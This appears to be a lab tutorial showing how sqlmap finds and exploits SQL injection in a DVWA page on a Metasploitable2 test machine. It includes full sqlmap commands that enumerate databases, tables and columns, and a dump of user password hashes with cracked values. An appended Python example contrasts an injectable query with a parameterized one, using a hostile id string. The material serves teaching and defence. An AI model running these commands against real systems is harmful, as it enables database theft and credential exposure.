What is sqlmap?

sqlmap is a free and open-source tool used to detect and exploit database vulnerabilities. It is a well-known and widely used tool for SQL injection. It is a command-line tool available for Linux, Windows and Mac operating systems. sqlmap fully supports multiple DBMSs, including Oracle, MySQL, MS SQL Server, PostgreSQL and SAP MaxDB. It also fully supports all injection techniques.

Demo of sqlmap

For the demo session I am using a vulnerable database machine which is available on VulnHub. It is also very easy to use and user-friendly.

Note:

Default user name of DVWA: admin
Password: password
~# sqlmap
~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

Additional options can be combined with it:

1. --dbs: displays all the databases
2. --tables: displays all the tables
3. --columns: displays all the columns
4. --dump: dumps the table entries

All of the above relates to SQL injection. The result can be seen in the figure above. The command takes one argument, -u, which specifies the target URL. The additional options can be appended after the URL. Sometimes we also have to supply the site's cookies with it.

~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

Finally we got some databases. In the above command we used the --dbs argument, which lists the databases, and as a result we have the list of databases. There are 7 databases available:

  1. dvwa
  2. information_schema
  3. metasploit
  4. mysql
  5. owasp10
  6. tikiwiki
  7. tikiwiki195

Metasploitable2 contains all of the above databases. Similarly, we can use the --tables option against any database, selected with -D.

~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa --tables;
[03:06:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[03:06:54] [INFO] fetching tables for database: 'dvwa'
[03:06:54] [INFO] used SQL query returns 2 entries
[03:06:54] [INFO] resumed: guestbook
[03:06:54] [INFO] resumed: users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

The output shows two tables: the first is guestbook and the other is users. We can enumerate both.

~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --columns;

Similarly, add the --columns option after selecting the table name; -T specifies the table. The result can be seen in the image below. Here we have 6 columns.

~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C first_name,password,user --dump;

Database: dvwa
Table: users
[5 entries]
+---------+------------+---------------------------------------------+
| user    | first_name | password                                    |
+---------+------------+---------------------------------------------+
| 1337    | Hack       | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | admin      | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | Gordon     | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | Pablo      | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | Bob        | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+------------+---------------------------------------------+

Finally we have the result, as seen in the image above. There are 5 users in this table. The same can be done with other tables and databases.
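
An added example, not part of the original post: why an id parameter like the one tested above is injectable, next to the parameterized form that closes the hole. It uses Python's sqlite3 with a constructed users table modelled on the dump above; the function names, the user_id values and the sample input are assumptions for illustration.

```python
import sqlite3

# Constructed rows modelled on the dvwa.users dump above; the user_id values are assumed.
ROWS = [("1", "admin", "admin"), ("2", "gordonb", "Gordon"), ("3", "1337", "Hack"),
        ("4", "pablo", "Pablo"), ("5", "smithy", "Bob")]
# Constructed input whose quote characters change the query when pasted into SQL text.
HOSTILE_ID = "1' OR '1'='1"


def make_db():
    """In-memory stand-in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT PRIMARY KEY, user TEXT, first_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def lookup_vulnerable(db, user_id):
    """Vulnerable: the value is concatenated into the SQL text, so quotes become syntax."""
    query = "SELECT first_name FROM users WHERE user_id = '" + user_id + "'"
    return [row[0] for row in db.execute(query)]


def lookup_parameterized(db, user_id):
    """Hardened: the value is bound separately and is only ever compared as data."""
    query = "SELECT first_name FROM users WHERE user_id = ?"
    return [row[0] for row in db.execute(query, (user_id,))]


def lookup_validated(db, user_id):
    """Defence in depth: accept only a plain decimal id, then use the bound query."""
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("id must be a decimal number")
    return lookup_parameterized(db, user_id)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1:       ", lookup_vulnerable(db, "1"))
    print("vulnerable, hostile id: ", lookup_vulnerable(db, HOSTILE_ID))
    print("parameterized, hostile: ", lookup_parameterized(db, HOSTILE_ID))
```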

